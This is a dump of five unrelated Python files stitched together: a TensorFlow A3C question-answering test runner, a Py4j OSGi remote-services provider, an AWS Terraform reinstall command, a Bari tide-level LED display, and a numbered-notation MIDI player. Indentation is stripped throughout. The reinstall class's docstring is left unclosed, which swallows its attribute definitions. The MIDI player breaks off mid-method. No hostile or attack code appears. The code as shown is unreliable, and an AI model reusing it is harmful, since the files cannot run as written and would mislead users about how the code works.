a3c_test.py
|
# -*- coding: utf-8 -*-
import pdb
import tensorflow as tf
import os
import threading
import numpy as np
import random
from networks.qa_planner_network import QAPlannerNetwork
from networks.free_space_network import FreeSpaceNetwork
from networks.end_to_end_baseline_network import EndToEndBaselineNetwork
from reinforcement_learning.a3c_testing_thread import A3CTestingThread
from utils import tf_util
from utils import py_util
import constants
def main():
if constants.OBJECT_DETECTION:
from darknet_object_detection import detector
detector.setup_detectors(constants.PARALLEL_SIZE)
with tf.device('/gpu:' + str(constants.GPU_ID)):
with tf.variable_scope('global_network'):
if constants.END_TO_END_BASELINE:
global_network = EndToEndBaselineNetwork()
else:
global_network = QAPlannerNetwork(constants.RL_GRU_SIZE, 1, 1)
global_network.create_net()
if constants.USE_NAVIGATION_AGENT:
with tf.variable_scope('nav_global_network') as net_scope:
free_space_network = FreeSpaceNetwork(constants.GRU_SIZE, 1, 1)
free_space_network.create_net()
else:
net_scope = None
# prepare session
sess = tf_util.Session()
if constants.PREDICT_DEPTH:
from depth_estimation_network import depth_estimator
with tf.variable_scope('') as depth_scope:
depth_estimator = depth_estimator.get_depth_estimator(sess)
else:
depth_scope = None
sess.run(tf.global_variables_initializer())
# Initialize pretrained weights after init.
if constants.PREDICT_DEPTH:
depth_estimator.load_weights()
testing_threads = []
for i in range(constants.PARALLEL_SIZE):
testing_thread = A3CTestingThread(i, sess, net_scope, depth_scope)
testing_threads.append(testing_thread)
tf_util.restore_from_dir(sess, constants.CHECKPOINT_DIR, True)
if constants.USE_NAVIGATION_AGENT:
print('now trying to restore nav model')
tf_util.restore_from_dir(sess, os.path.join(constants.CHECKPOINT_PREFIX, 'navigation'), True)
sess.graph.finalize()
question_types = constants.USED_QUESTION_TYPES
rows = []
for q_type in question_types:
curr_rows = list(range(len(testing_thread.agent.game_state.test_datasets[q_type])))
#curr_rows = list(range(8))
rows.extend(list(zip(curr_rows, [q_type] * len(curr_rows))))
random.shuffle(rows)
answers_correct = []
ep_lengths = []
ep_rewards = []
invalid_percents = []
time_lock = threading.Lock()
if not os.path.exists(constants.LOG_FILE):
os.makedirs(constants.LOG_FILE)
out_file = open(constants.LOG_FILE + '/results_' + constants.TEST_SET + '_' + py_util.get_time_str() + '.csv', 'w')
out_file.write(constants.LOG_FILE + '\n')
out_file.write('question_type, answer_correct, answer, gt_answer, episode_length, invalid_action_percent, scene number, seed, required_interaction\n')
def test_function(thread_ind):
testing_thread = testing_threads[thread_ind]
sess.run(testing_thread.sync)
#from game_state import QuestionGameState
#if testing_thread.agent.game_state is None:
#testing_thread.agent.game_state = QuestionGameState(sess=sess)
while len(rows) > 0:
time_lock.acquire()
if len(rows) == 0:
break
row = rows.pop()
time_lock.release()
answer_correct, answer, gt_answer, ep_length, ep_reward, invalid_percent, scene_num, seed, required_interaction = testing_thread.process(row)
question_type = row[1] + 1
time_lock.acquire()
output_str = ('%d, %d, %d, %d, %d, %f, %d, %d, %d\n' % (question_type, answer_correct, answer, gt_answer, ep_length, invalid_percent, scene_num, seed, required_interaction))
out_file.write(output_str)
out_file.flush()
answers_correct.append(int(answer_correct))
ep_lengths.append(ep_length)
ep_rewards.append(ep_reward)
invalid_percents.append(invalid_percent)
print('###############################')
print('ep ', row)
print('num episodes', len(answers_correct))
print('average correct', np.mean(answers_correct))
print('invalid percents', np.mean(invalid_percents), np.median(invalid_percents))
print('###############################')
time_lock.release()
test_threads = []
for i in range(constants.PARALLEL_SIZE):
test_threads.append(threading.Thread(target=test_function, args=(i,)))
for t in test_threads:
t.start()
for t in test_threads:
t.join()
out_file.close()
if __name__ == '__main__':
main()
|
py4j.py
|
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
Py4j-based Distribution and Discovery Provider
:author: Scott Lewis
:copyright: Copyright 2020, Scott Lewis
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 Scott Lewis
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from concurrent.futures import ThreadPoolExecutor
from queue import Queue
from threading import Thread, RLock
import logging
from osgiservicebridge.bridge import (
JavaServiceProxy,
Py4jServiceBridgeEventListener,
Py4jServiceBridge,
PythonService,
)
from osgiservicebridge.protobuf import (
ProtobufJavaServiceProxy,
ProtobufPythonService,
)
from py4j.java_gateway import GatewayParameters, CallbackServerParameters
from py4j.java_gateway import DEFAULT_PORT, DEFAULT_PYTHON_PROXY_PORT
# needed ipopo decorators
from pelix.ipopo.decorators import (
ComponentFactory,
Provides,
Instantiate,
Property,
Validate,
ValidateComponent,
Invalidate,
PostRegistration,
)
from pelix.ipopo.constants import (
ARG_BUNDLE_CONTEXT,
ARG_PROPERTIES,
)
# Providers API
from pelix.rsa import prop_dot_suffix
from pelix.rsa.providers.distribution import (
Container,
ExportContainer,
ImportContainer,
DistributionProvider,
SERVICE_EXPORT_CONTAINER,
SERVICE_IMPORT_CONTAINER,
SERVICE_EXPORT_DISTRIBUTION_PROVIDER,
SERVICE_IMPORT_DISTRIBUTION_PROVIDER,
)
from pelix.rsa.endpointdescription import EndpointDescription
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
# Note: These must match the Java-side constants recorded in the Java interface
# class: org.eclipse.ecf.provider.py4j.Py4jConstants
ECF_PY4J_CONTAINER_CONFIG_TYPE = "ecf.py4j"
ECF_PY4J_NAMESPACE = "ecf.namespace.py4j"
ECF_PY4J_JAVA_HOST_CONFIG_TYPE = "ecf.py4j.host"
ECF_PY4J_JAVA_CONSUMER_CONFIG_TYPE = "ecf.py4j.consumer"
ECF_PY4J_PYTHON_HOST_CONFIG_TYPE = "ecf.py4j.host.python"
ECF_PY4J_PYTHON_CONSUMER_CONFIG_TYPE = "ecf.py4j.consumer.python"
ECF_PY4J_SUPPORTED_INTENTS = [
"exactlyOnce",
"passByReference",
"ordered",
"py4j",
"py4j.async",
"osgi.async",
"osgi.private",
]
# Protobuf
ECF_PY4JPB_JAVA_HOST_CONFIG_TYPE = "ecf.py4j.protobuf.host"
ECF_PY4JPB_JAVA_CONSUMER_CONFIG_TYPE = "ecf.py4j.protobuf.consumer"
ECF_PY4JPB_PYTHON_HOST_CONFIG_TYPE = "ecf.py4j.python.protobuf.host"
ECF_PY4JPB_PYTHON_CONSUMER_CONFIG_TYPE = "ecf.py4j.python.protobuf.consumer"
ECF_PY4JPB_SUPPORTED_INTENTS = [
"exactlyOnce",
"passByReference",
"passByValue",
"ordered",
"py4j",
"py4j.protobuf",
"py4j.async",
"osgi.async",
"osgi.private",
]
ECF_PY4J_JAVA_PORT_PROP = "javaport"
ECF_PY4J_PYTHON_PORT_PROP = "pythonport"
ECF_PY4J_DEFAULT_SERVICE_TIMEOUT = "defaultservicetimeout"
# ------------------------------------------------------------------------------
@ComponentFactory(ECF_PY4J_CONTAINER_CONFIG_TYPE)
@Provides([SERVICE_EXPORT_CONTAINER, SERVICE_IMPORT_CONTAINER])
class Py4jContainer(ExportContainer, ImportContainer):
def __init__(self, max_workers=5):
ExportContainer.__init__(self)
ImportContainer.__init__(self)
self._max_workers = max_workers
self._executor = None
@ValidateComponent(ARG_BUNDLE_CONTEXT, ARG_PROPERTIES)
def _validate_component(self, bundle_context, container_props):
Container._validate_component(self, bundle_context, container_props)
self._executor = ThreadPoolExecutor(max_workers=self._max_workers)
@Invalidate
def _invalidate_component(self, _):
Container._invalidate_component(self, _)
if self._executor:
self._executor.shutdown()
self._executor = None
def get_connected_id(self):
return ExportContainer.get_connected_id(self)
def _export_service(self, svc, ed):
# pylint: disable=W0212
# modify svc class to have appropriate metadata for py4j
timeout = ed.get_osgi_basic_timeout()
if not timeout:
timeout = 30
args = [
self._get_distribution_provider()._get_bridge(),
ed.get_interfaces(),
svc,
self._executor,
timeout,
]
if (
ECF_PY4JPB_PYTHON_HOST_CONFIG_TYPE
in ed.get_remote_configs_supported()
):
clazz = ProtobufPythonService
else:
clazz = PythonService
psvc = clazz(*args)
self._get_distribution_provider()._get_bridge().export(
psvc, ed.get_properties()
)
ExportContainer._export_service(self, psvc, ed)
return True
def _unexport_service(self, ed):
# pylint: disable=W0212
dp = self._get_distribution_provider()
if dp:
bridge = dp._get_bridge()
if bridge:
bridge.unexport(ed.get_id())
ExportContainer._unexport_service(self, ed)
return True
def _prepare_proxy(self, endpoint_description):
# pylint: disable=W0212
# lookup the bridge proxy associated with the
# endpoint_description.get_id()
bridge = self._get_distribution_provider()._get_bridge()
proxy = bridge.get_import_endpoint(endpoint_description.get_id())[0]
timeout = endpoint_description.get_osgi_basic_timeout()
if not timeout:
timeout = self._container_props.get(
ECF_PY4J_DEFAULT_SERVICE_TIMEOUT, 30
)
args = [
bridge.get_jvm(),
endpoint_description.get_interfaces(),
proxy,
self._executor,
timeout,
]
clazz = JavaServiceProxy
if (
ECF_PY4JPB_JAVA_HOST_CONFIG_TYPE
in endpoint_description.get_remote_configs_supported()
):
clazz = ProtobufJavaServiceProxy
return clazz(*args)
def unimport_service(self, endpoint_description):
# pylint: disable=W0212
dp = self._get_distribution_provider()
if dp:
bridge = dp._get_bridge()
if bridge:
bridge.remove_import_endpoint(endpoint_description.get_id())
ImportContainer.unimport_service(self, endpoint_description)
@ComponentFactory("py4j-distribution-provider-factory")
@Provides(
[SERVICE_EXPORT_DISTRIBUTION_PROVIDER, SERVICE_IMPORT_DISTRIBUTION_PROVIDER]
)
@Property("_config_name", "config_name", ECF_PY4J_CONTAINER_CONFIG_TYPE)
@Property("_namespace", "namespace", ECF_PY4J_NAMESPACE)
@Property(
"_supported_configs",
"supported_configs",
[ECF_PY4J_PYTHON_HOST_CONFIG_TYPE, ECF_PY4J_PYTHON_CONSUMER_CONFIG_TYPE],
)
@Property("_supported_intents", "supported_intents",
ECF_PY4J_SUPPORTED_INTENTS)
@Property(
"_supported_pb_intents",
"supported_pb_intents",
ECF_PY4JPB_SUPPORTED_INTENTS,
)
@Property(
"_javaport",
prop_dot_suffix(ECF_PY4J_CONTAINER_CONFIG_TYPE, ECF_PY4J_JAVA_PORT_PROP),
DEFAULT_PORT,
)
@Property(
"_pythonport",
prop_dot_suffix(ECF_PY4J_CONTAINER_CONFIG_TYPE, ECF_PY4J_PYTHON_PORT_PROP),
DEFAULT_PYTHON_PROXY_PORT,
)
@Property(
"_default_service_timeout",
prop_dot_suffix(
ECF_PY4J_CONTAINER_CONFIG_TYPE, ECF_PY4J_DEFAULT_SERVICE_TIMEOUT
),
30,
)
@Instantiate("py4j-distribution-provider")
class Py4jDistributionProvider(
DistributionProvider, Py4jServiceBridgeEventListener
):
def __init__(self):
super(Py4jDistributionProvider, self).__init__()
self._bridge = None
self._container = None
self._queue = Queue()
self._thread = Thread(target=self._worker)
self._thread.daemon = True
self._done = False
self._lock = RLock()
self._py4jcontainer = self._supported_pb_intents = None
self._javaport = self._pythonport = self._default_service_timeout = None
def _get_bridge(self):
return self._bridge
    # Override of DistributionProvider._get_imported_configs. Returns the list of
    # Python-side config types corresponding to the given exported configs.
def _get_imported_configs(self, exported_configs):
imported_configs = []
if ECF_PY4JPB_JAVA_HOST_CONFIG_TYPE in exported_configs:
imported_configs.append(ECF_PY4JPB_PYTHON_HOST_CONFIG_TYPE)
if ECF_PY4J_JAVA_HOST_CONFIG_TYPE in exported_configs:
imported_configs.append(ECF_PY4J_PYTHON_HOST_CONFIG_TYPE)
return imported_configs
# Implementation of ImportDistributionProvider
def supports_import(self, exported_configs, service_intents, import_props):
# pylint: disable=W0613
if ECF_PY4JPB_JAVA_HOST_CONFIG_TYPE in exported_configs:
if self._match_intents_supported(
service_intents, self._supported_pb_intents
):
return self._container
elif ECF_PY4J_JAVA_HOST_CONFIG_TYPE in exported_configs:
if self._match_intents(service_intents):
return self._container
return None
# Implementation of ExportDistributionProvider
def supports_export(self, exported_configs, service_intents, export_props):
# pylint: disable=W0613
if self._match_intents(service_intents):
if (
ECF_PY4J_PYTHON_HOST_CONFIG_TYPE in exported_configs
or ECF_PY4JPB_PYTHON_HOST_CONFIG_TYPE in exported_configs
):
return self._container
return None
@Validate
def _validate(self, _):
# here is where we can get java and python ports and change the
# defaults for connecting
try:
self._bridge = Py4jServiceBridge(
service_listener=self,
gateway_parameters=GatewayParameters(port=self._javaport),
callback_server_parameters=CallbackServerParameters(
port=self._pythonport
),
)
self._bridge.connect()
except Exception as e:
self._bridge = None
raise e
# Once bridge is connected, instantiate container using bridge id
container_props = self._prepare_container_props(
self._supported_intents, None
)
if self._default_service_timeout:
container_props[
ECF_PY4J_DEFAULT_SERVICE_TIMEOUT
] = self._default_service_timeout
self._container = self._ipopo.instantiate(
self._config_name, self._bridge.get_id(), container_props
)
@Invalidate
def _invalidate(self, _):
if self._bridge:
with self._lock:
# Set done flag to True
self._done = True
# Trigger reading from queue in self._worker
# with empty task
self._queue.put((None, None, None))
try:
self._ipopo.invalidate(self._bridge.get_id())
except ValueError:
pass
try:
self._bridge.disconnect()
except Exception:
pass
self._bridge = None
self._container = None
# Implementation of Py4jServiceBridgeEventListener
def service_imported(
self, servicebridge, endpointid, proxy, endpoint_props
):
        # put on the task queue so there is no blocking, but FIFO delivery to RSA
# _logger.info('service_imported endpointid='+endpointid)
self._queue.put((endpointid, endpoint_props, self._handle_import))
def service_modified(
self, servicebridge, endpointid, proxy, endpoint_props
):
# _logger.info('_service_modified endpointid='+endpointid+";proxy="+str(proxy)+";endpoint_props="+str(endpoint_props))
self._queue.put(
(endpointid, endpoint_props, self._handle_import_update)
)
def service_unimported(
self, servicebridge, endpointid, proxy, endpoint_props
):
# _logger.info('_service_unimported endpointid='+endpointid+";proxy="+str(proxy)+";endpoint_props="+str(endpoint_props))
        # put on the task queue so there is no blocking, but FIFO delivery to RSA
self._queue.put(
(endpointid,
endpoint_props,
self._handle_import_close))
@PostRegistration
def _post_reg(self, _):
# start the thread for processing import_service import requests
self._thread.start()
    # This method is run by self._thread. All it does is read from the queue
    # and import/update/unimport the discovered service.
def _worker(self):
while True:
with self._lock:
# If self._done flag is set, return and that's it
if self._done:
return
# otherwise block to get items from queue placed by service_imported,
# service_modified, and service_unimported
# called by Py4j handler thread
item = self._queue.get()
f = None
try:
# get the function from item[2]
f = item[2]
except Exception:
logging.error("Exception getting code in item=%s", item)
if f:
try:
# get the endpoint description properties from item[1]
# and create EndpointDescription instance
ed = EndpointDescription(properties=item[1])
except Exception:
logging.error(
"Exception creating endpoint description from props=%s",
item[1],
)
else:
# call appropriate function
try:
f(ed)
except Exception:
logging.error("Exception invoking function=%s", f)
# no matter what, we are done with this task
self._queue.task_done()
|
reinstall.py
|
from core.config import Settings
from core.providers.aws.install import Install
from core import constants as K
from core.terraform import PyTerraform
from threading import Thread
from datetime import datetime
import os
import sys
class ReInstall(Install): # Do not inherit Destroy
"""
    AWS provider for the reinstall (destroy and re-create) command
    Attributes:
        executed_with_error (boolean): this is set to True if any error occurs
        FOLDER_EXISTS_ERROR_NO (int): Error number of folder creation failure
        install_statuses (dict): Available install statuses
        terraform_thread (Thread): Install python thread
        terraform_outputs (dict): Terraform output dict
        current_install_status (int): Current install status
destroy = False
exception = None
def execute(self, resources_to_destroy, resources_to_install, terraform_with_targets, dry_run):
"""
        This is the starting method where the reinstall begins; it is the actual method called from the main install class
        Args:
            resources_to_destroy (list): Resources to be destroyed
            resources_to_install (list): Resources to be installed
            terraform_with_targets (boolean): If partial install is to be done (if --tags is supplied)
            dry_run (boolean): Decides whether original install should be done
"""
self.generate_terraform_files(resources_to_install, terraform_with_targets)
self.run_tf_execution_and_status_threads(resources_to_destroy, resources_to_install, terraform_with_targets, dry_run)
if not self.executed_with_error:
self.render_resource_outputs(resources_to_install)
else:
raise self.exception
def run_tf_execution_and_status_threads(self, resources_to_destroy, resources_to_install, terraform_with_targets, dry_run):
"""
        Creates 2 threads:
            1. For the actual installation
            2. For displaying the status of the installation
        The install runs in one thread while its status is rendered in the other
        Args:
            resources_to_destroy (list): Resources to be destroyed
            resources_to_install (list): Resources to be installed
            terraform_with_targets (boolean): If partial install is to be done (if --tags is supplied)
            dry_run (boolean): Decides whether original install should be done
"""
self.terraform_thread = Thread(
target=self.re_create_resources,
args=(list(resources_to_destroy), list(resources_to_install), terraform_with_targets, dry_run)
)
progressbar_thread = Thread(target=self.show_progress_status_all, args=(list(resources_to_install), terraform_with_targets, dry_run))
self.terraform_thread.start()
progressbar_thread.start()
self.terraform_thread.join()
progressbar_thread.join()
def re_create_resources(self, resources_to_destroy, resources_to_install, terraform_with_targets, dry_run):
"""
        Destroy the selected resources by calling PyTerraform, then re-create the resources to install
        Args:
            resources_to_destroy (list): Resources to be destroyed
            resources_to_install (list): Resources to be created
            terraform_with_targets (boolean): If partial install is to be done (if --tags is supplied)
            dry_run (boolean): Decides whether original install should be done
"""
try:
if not dry_run:
PyTerraform().terraform_destroy(resources_to_destroy)
self.destroy = True
self.terraform_apply(resources_to_install, terraform_with_targets, dry_run)
except Exception as e:
self.executed_with_error = True
self.exception = e
self.destroy = True # If there is any error in destroy set destroy to True
self._cleanup_installation_process(dry_run)
def show_progress_status_all(self, resources, terraform_with_targets, dry_run):
"""
        Show the status of the installation continuously in this thread
Args:
resources (list): Resources to be created
terraform_with_targets (boolean): If partial install is to be done (if --tags is supplied)
dry_run (boolean): Decides whether original install should be done
"""
self.render_terraform_destroy_progress() # Show destroy progress
self.show_progress_status(resources, terraform_with_targets, dry_run) # Show install progress
def render_terraform_destroy_progress(self):
"""Show the status of terraform init command execution"""
self.show_step_heading(K.TERRAFORM_REDEPLOY_DESTROY_STARTED, write_log=False)
start_time = datetime.now()
        while self.destroy is False and self.terraform_thread.is_alive():
duration = self.CYAN_ANSI + self.get_duration(datetime.now() - start_time) + self.END_ANSI
message = "Time elapsed: %s" % duration
self.show_progress_message(message, 1.5)
end_time = datetime.now()
self.erase_printed_line()
if self.exception:
self.show_step_finish(K.TERRAFORM_DESTROY_ERROR, write_log=False, color=self.ERROR_ANSI)
else:
self.show_step_finish(K.TERRAFORM_REDEP_DESTROY_COMPLETED, write_log=False, color=self.GREEN_ANSI)
self.display_process_duration(start_time, end_time)
|
when_above.py
|
# --------------------------------------------------
# Copyright (C) 2020 Antonio Viesti (a.viesti@eutropia.it).
# Creative Commons CC BY (https://creativecommons.org/licenses/by/4.0/)
# --------------------------------------------------
# Mareografie (1) — When above — Alta e bassa marea.
#
# «Mareografie (1) — When above» gets the current sea level value near Italian sea towns and draws it on an 8x8 LED panel, iteratively.
# A tide gauge — also known as mareograph, marigraph, sea-level recorder, or limnimeter — is a device for measuring the change in sea level (hydrometric_level).
# The Italian ISPRA National Tidegauge Network is composed of 36 monitoring stations — powered by solar panels — located in:
# Ancona
# Anzio
# Bari
# Cagliari
# Carloforte
# Catania
# Civitavecchia
# Crotone
# Gaeta
# Genova
# Ginostra
# Imperia
# La Spezia
# Lampedusa
# Livorno
# Marina di Campo
# Messina
# Napoli
# Ortona
# Otranto
# Palermo
# Palinuro
# Ponza
# Porto Empedocle
# Porto Torres
# Ravenna
# Reggio Calabria
# Salerno
# San Benedetto del Tronto
# Sciacca
# Strombolicchio
# Taranto
# Tremiti
# Trieste
# Valona
# Venezia
# Vieste
import logging
import time
from queue import Queue
from threading import Thread
from ispra_rmn.ispra_rmn_services import get_discretized_hydrometric_level_nearby
from led_panel.led_panel_drawings import draw_level, get_device_in_default_configuration
# Tide gauge geographical reference.
here = 'Bari'
# LED panel resolution.
dots = 8
# Hydrometric level queue.
level_queue = Queue()
# Gets and enqueues the hydrometric level value.
#
# Args:
# here: the tide gauge geographical reference.
# dots: the LED panel resolution.
# level_queue: the queue of hydrometric level values.
def get_hydrometric_level_nearby(here, dots, level_queue):
cuts = dots
while True:
level = get_discretized_hydrometric_level_nearby(here, cuts)
level_queue.put(level)
time.sleep(60*10) # TODO 60*5
# Dequeues and draws the hydrometric level value.
#
# Args:
# level_queue: the queue of hydrometric level values.
def draw_hydrometric_level(level_queue):
device = get_device_in_default_configuration()
level = 0
while True:
if not level_queue.empty():
            level = level_queue.get()
if level > 0:
draw_level(device, level)
# Configure logging.
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# Thread the ingesting and enqueuing of the hydrometric level.
thread_get_hydrometric_level_nearby = Thread(target = get_hydrometric_level_nearby, args = (here, dots, level_queue, ))
thread_get_hydrometric_level_nearby.daemon = True
thread_get_hydrometric_level_nearby.start()
# Thread the dequeuing and drawing of the hydrometric level.
thread_draw_hydrometric_level = Thread(target = draw_hydrometric_level, args = (level_queue, ))
thread_draw_hydrometric_level.daemon = True
thread_draw_hydrometric_level.start()
while True:
    time.sleep(1)
# --------------------------------------------------
|
midi_player.py
|
# Created by Xinyu Zhu on 2020/12/23, 23:16
import pygame.midi
import time
import threading
from node.pianoNode.ply_standardlizer import auto_format_for_file
from node.pianoNode.music_visualizer import MusicDataManager
from common.io.file.PlainTextClient import read_io_file
class MidiPlayer:
def __init__(self):
        # For each digit in numbered (jianpu) notation, how many semitones the actual pitch is above the base pitch
self.unit_offset = {
"1": 0,
"2": 2,
"3": 4,
"4": 5,
"5": 7,
"6": 9,
"7": 11
}
        # The player's initial base pitch; 60 is the MIDI note for '1' (do) in C major
self.base_freq = 60
self.offset = 0
        # Depending on the key of the score, how much the player's base pitch should be raised above the initial base pitch
self.key_offset = {
"C": 0,
"Db": 1,
"C#": 1,
"D": 2,
"Eb": 3,
"E": 4,
"F": 5,
"Gb": 6,
"F#": 6,
"G": 7,
"Ab": 8,
"A": 9,
"Bb": 10,
"B": 11,
"Cb": 11
}
        # Duration of one beat in seconds
self.pt = 0.66
self.default_velocity = 127
        # 4/4 time; mainly affects the strength of each beat
self.beat = "4/4"
        # Music usually has its rhythmic feel designed in already, so there is no need to tweak beat strength; equal loudness sounds better
self.strong_beat = 127
self.less_strong_beat = 127
self.weak_beat = 127
self.auto_close_instrument = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 47, 112, 113, 114, 115, 116,
117, 118, 119, 127, 45}
        # For instruments that cannot stop automatically, force them to stop after n beats
self.auto_close_duration_index = 1
self.default_instrument = [0]
        # Initialize the MIDI module used for sound output
pygame.midi.init()
self.output = pygame.midi.Output(pygame.midi.get_default_output_id())
self.ins_to_channel = {
0: 0
}
self.next_channel = 1
self.data_manager = MusicDataManager()
        # Whether to always use the default instrument instead of following the score
self.force_instrument = False
self.force_to = 0
def choose_from_default_instrument(self, channel_index):
index = int(channel_index * len(self.default_instrument))
# print(channel_index, self.default_instrument, index)
return self.default_instrument[index]
def get_channel_for_instrument(self, instrument):
return 0
# if instrument in self.ins_to_channel:
# return self.ins_to_channel[instrument]
# else:
# self.ins_to_channel[instrument] = self.next_channel
# self.next_channel += 1
# if self.next_channel > 15:
# self.next_channel = 1
# return self.ins_to_channel[instrument]
def auto_play_and_close(self, note, velocity=127, duration=2, channel=0):
self.output.note_on(note, velocity, channel)
time.sleep(duration)
self.output.note_off(note, velocity, channel)
def play_single_note(self, instrument, note, velocity, duration=-1.0, channel_index=0):
self.output.set_instrument(instrument, channel_index)
if duration == -1.0:
self.output.note_on(note, velocity, channel_index)
else:
threading.Thread(target=self.auto_play_and_close,
args=(note, velocity, duration, channel_index)).start()
def play_note(self, note):
for note_number in note["note"]:
if note_number > 0:
if note["ins"] in self.auto_close_instrument:
self.play_single_note(note["ins"], note_number, note["velocity"], -1.0,
self.get_channel_for_instrument(note["ins"]))
else:
self.play_single_note(note["ins"], note_number, note["velocity"],
self.pt * self.auto_close_duration_index,
self.get_channel_for_instrument(note["ins"]))
time.sleep(self.pt / len(note["note"]))
def play_chord(self, notes):
threads = []
for i, note in enumerate(notes):
threads.append(
threading.Thread(target=self.play_note, args=(note,)))
[thr.start() for thr in threads]
[thr.join() for thr in threads]
def play_section(self, list_of_notes: list):
for notes in list_of_notes:
#print(notes)
self.play_chord(notes)
def single_note_to_num(self, single_note: str):
"""
        Convert a single note in numbered (jianpu) notation into an actual MIDI note number.
        Supported rules: "1": a plain note; "1#": raise by a semitone; ".1": raise by an octave; "1..": lower by two octaves;
        "1..#" or "1#..": lower by two octaves and raise by a semitone.
        ".1." is parsed as raising by two octaves; ".1##." ignores the repeated "#" and is parsed as "..1#".
        Unsupported: ".8." is outside the range 1-7 and returns -1 (not played); "@1" contains an illegal character and returns -1 (not played).
"""
        # A leading '.' means the note is raised by some number of octaves; otherwise it is lowered
should_increase_7 = (single_note[0] == ".")
        # The number of '.' characters determines how many octaves to shift
cycle_should_change = single_note.count(".")
        # The characters left after removing '.' and '#' are the scale degree to play
unit_key = single_note.replace(".", "").replace("#", "")
if unit_key in self.unit_offset:
unit_key_freq = self.base_freq + self.unit_offset[unit_key] + self.offset * 12
else:
return -1
if "#" in single_note:
unit_key_freq += 1
if should_increase_7:
unit_key_freq += cycle_should_change * 12
else:
unit_key_freq -= cycle_should_change * 12
return unit_key_freq
def note_str_to_note(self, note_str: str) -> list:
"""
        Convert connected notes such as "1_2." into a list; all notes in the list share one beat's total playing time.
        Several beats form one bar (segment) of a track; in 4/4 music, 4 beats make a bar.
        The bars of all tracks at the same position form a section, i.e. one line of the score; playback parses and plays section by section.
        A single note also forms a list of length 1.
"""
result = []
for single_unit in note_str.split("_"):
result.append(self.single_note_to_num(single_unit))
return result
def parse_section_channel(self, channel_str: str, channel_index: float) -> list:
        # Each channel may be followed by square brackets setting that channel's attributes (instrument, volume, etc.)
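        # Hypothetical example: the channel string "1 3 5 1[ins=0, vol=100]" plays the notes
        # 1 3 5 1 on instrument 0 at volume 100.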
local_attr_str = ""
if "[" in channel_str:
local_attr_str = channel_str[channel_str.index("[") + 1:channel_str.index("]")]
channel_str = channel_str[0:channel_str.index("[")]
channel_str = channel_str.strip()
attr = self.get_attr_from_str(local_attr_str, channel_index)
result = []
for note_str in channel_str.split():
note = {
"ins": self.force_to if self.force_instrument else attr["ins="],
"note": self.note_str_to_note(note_str),
"velocity": attr["vol="]
}
result.append(note)
return result
def parse_repeated_channel(self, channel, last_channel, channel_index: float):
channel = channel.strip()
should_increase_note = 1 if channel.startswith(".") else -1
increase_count = channel.count(".")
this_channel = []
for channel_note in last_channel:
base_notes = channel_note["note"]
new_notes = []
for note in base_notes:
if note > 0:
new_notes.append(note + increase_count * 12 * should_increase_note)
else:
new_notes.append(note)
this_channel_node = {
"ins": self.force_to if self.force_instrument else channel_note["ins"],
"note": new_notes,
"velocity": channel_note["velocity"]
}
this_channel.append(this_channel_node)
return this_channel
def parse_section(self, section_str: str):
result = []
total_channel_num = section_str.count("|") + 1
for i, channel in enumerate(section_str.split("|")):
if "*" in channel:
result.append(self.parse_repeated_channel(channel, result[-1], i / total_channel_num))
else:
result.append(self.parse_section_channel(channel, i / total_channel_num))
re_arranged_result = []
for i in range(len(result[0])):
buffer = []
for j in range(len(result)):
if i >= len(result[j]):
print("Error in channel length:", section_str)
print(section_str.split("|")[j])
buffer.append(result[j][i])
re_arranged_result.append(buffer)
return re_arranged_result
def get_attr_from_str(self, attr="", channel_index=0):
base_attr = {
"1=": self.base_freq,
"p=": self.beat,
"pm=": self.pt,
"offset=": self.offset,
"ins=": self.choose_from_default_instrument(channel_index),
"vol=": self.default_velocity
}
attrs = attr.split(",")
for attr_unit in attrs:
attr_unit = attr_unit.replace(" ", "")
if "1=" in attr_unit:
key = attr_unit.replace("1=", "").strip()
base_attr["1="] = 60 + self.key_offset[key]
elif "p=" in attr_unit:
base_attr["p="] = attr_unit.replace("p=", "").strip()
elif "pm=" in attr_unit:
base_attr["pm="] = 60 / int(attr_unit.replace("pm=", ""))
elif "offset=" in attr_unit:
base_attr["offset="] = int(attr_unit.replace("offset=", ""))
elif "ins=" in attr_unit:
base_attr["ins="] = int(attr_unit.replace("ins=", ""))
elif "vol=" in attr_unit:
base_attr["vol="] = int(attr_unit.replace("vol=", ""))
return base_attr
def set_attr(self, attr: str):
attrs = attr.split(",")
for attr_unit in attrs:
self.set_attr_unit(attr_unit)
def set_attr_unit(self, attr_unit: str):
attr_unit = attr_unit.replace(" ", "")
if "1=" in attr_unit:
key = attr_unit.replace("1=", "").strip()
self.base_freq = 60 + self.key_offset[key]
elif "p=" in attr_unit:
self.beat = attr_unit.replace("p=", "").strip()
elif "pm=" in attr_unit:
self.pt = 60 / int(attr_unit.replace("pm=", ""))
elif "offset=" in attr_unit:
self.offset = int(attr_unit.replace("offset=", ""))
elif "ins=" in attr_unit:
ins_content = attr_unit.replace("ins=", "")
# support things like: ins = (1|2|3)
if "(" not in ins_content:
self.default_instrument = [int(ins_content)]
else:
ins_content = ins_content.replace("(", "").replace(")", "")
self.default_instrument = []
for ins in ins_content.split("|"):
self.default_instrument.append(int(ins))
elif "vol=" in attr_unit:
self.default_velocity = int(attr_unit.replace("vol=", ""))
def stream_music(self, music_sheet: list):
play = True
for line in music_sheet:
if "//" in line:
                # Skip comments
continue
if "<" in line:
                # Stop playback until '>' is seen
play = False
continue
if ">" in line:
                # Resume playback
play = True
continue
if "=" in line and "[" not in line:
                # Set global attributes
self.set_attr(line)
continue
if play and line != "":
print(line)
self.play_section(self.parse_section(line))
def compile_music(self, music_sheet: list):
self.data_manager.init()
for line in music_sheet:
if "//" in line or "<" in line or ">" in line:
                # Skip comments and playback control lines
continue
if "=" in line and "[" not in line:
                # Set global attributes
self.set_attr(line)
continue
if line != "":
